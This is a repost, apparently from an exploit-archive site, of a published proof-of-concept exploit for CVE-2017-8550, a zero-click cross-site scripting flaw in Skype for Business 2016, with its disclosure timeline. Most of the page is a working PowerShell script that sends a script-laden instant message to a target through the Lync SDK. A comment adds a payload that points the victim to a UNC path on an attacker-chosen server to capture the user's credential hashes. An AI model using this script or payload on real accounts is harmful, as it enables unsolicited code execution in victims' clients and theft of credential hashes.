首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Skype for Business 2016 - Cross-Site Scripting
来源:@nyxgeek - TrustedSec 作者:nyxgeek 发布时间:2017-07-14  
# Exploit Title:  Skype for Business 2016 XSS Injection - CVE-2017-8550
#
# Exploit Author: @nyxgeek - TrustedSec
# Date: 2017-04-10
# Vendor Homepage: www.microsoft.com
# Versions: 16.0.7830.1018 32-bit & 16.0.7927.1020 64-bit or lower
#
#
# Requirements: Originating machine needs Lync 2013 SDK installed as well as a user logged
# into the Skype for Business client locally
#
#
# Description:
#
# XSS injection is possible via the Lync 2013 SDK and PowerShell. No user-interaction is
# required for the XSS to execute on the target machine. It will run regardless of whether
# or not they accept the message. The target only needs to be online.
#
# Additionally, by forcing a browse to a UNC path via the file URI it is possible to
# capture hashed user credentials for the current user.
# Example:
# <script>document.location.replace=('file:\\\\server.ip.address\\test.txt');</script>
#
#
# Shoutout to @kfosaaen for providing the base PowerShell code that I recycled
#
#
# Timeline of Disclosure
# ----------------------
# 4/24/2017 Submitted to Microsoft
# 5/09/2017 Received confirmation that they were able to reproduce
# 6/14/2017 Fixed by Microsoft
 
 
 
 
#target user
$target = "username@domain.com"
 
# For this example we will force the user to navigate to a page of our choosing (autopwn?)
# Skype uses the default browser for this.
 
$message = "PoC Skype for Business 2016 XSS Injection<script>document.location.href=('http://www.youtube.com/watch?v=9Rnr70wCQSA')</script>"
 
 
 
 
if (-not (Get-Module -Name Microsoft.Lync.Model))
{
    try
        {
        # you may need to change the location of this DLL
            Import-Module "C:\Program Files\Microsoft Office\Office15\LyncSDK\Assemblies\Desktop\Microsoft.Lync.Model.dll" -ErrorAction Stop
        }
    catch
        {
            Write-Warning "Microsoft.Lync.Model not available, download and install the Lync 2013 SDK http://www.microsoft.com/en-us/download/details.aspx?id=36824"
        }
}
 
 # Connect to the local Skype process
    try
    {
        $client = [Microsoft.Lync.Model.LyncClient]::GetClient()
    }
    catch
    {
        Write-Host "`nMust be signed-in to Skype"
        break
    }
 
     #Start Conversation
    $msg = New-Object "System.Collections.Generic.Dictionary[Microsoft.Lync.Model.Conversation.InstantMessageContentType, String]"
 
    #Add the Message
    $msg.Add(1,$message)
 
    # Add the contact URI
    try
    {
        $contact = $client.ContactManager.GetContactByUri($target)
    }
    catch
    {
        Write-Host "`nFailed to lookup Contact"$target
        break
    }
 
 
    # Create a conversation
    $convo = $client.ConversationManager.AddConversation()
    $convo.AddParticipant($contact) | Out-Null
 
    # Set the message mode as IM
    $imModality = $convo.Modalities[1]
    # Send the message
    $imModality.BeginSendMessage($msg, $null, $imModality) | Out-Null
    # End the Convo to suppress the UI
    $convo.End() | Out-Null
 
    Write-Host "Sent the following message to "$target":`n"$message
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·RaidenHTTPD 2.0.44 User-Agent
·PyCharm 2-0 / 2017 Buffer Over
·IBM Informix 12.10 DB-Access B
·Apache Struts 2.3.x Showcase -
·Microsoft Windows Windows 7/8.
·Counter Strike: Condition Zero
·WMI Event Subscription Persist
·Firefox 50.0.1 - ASM.JS JIT-Sp
·DNS/DNSSEC RR Stub Resolver De
·FTPGetter 5.89.0.85 - Buffer O
·Easy File Sharing Web Server 7
·iSmartAlarm CubeOne Remote Com
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved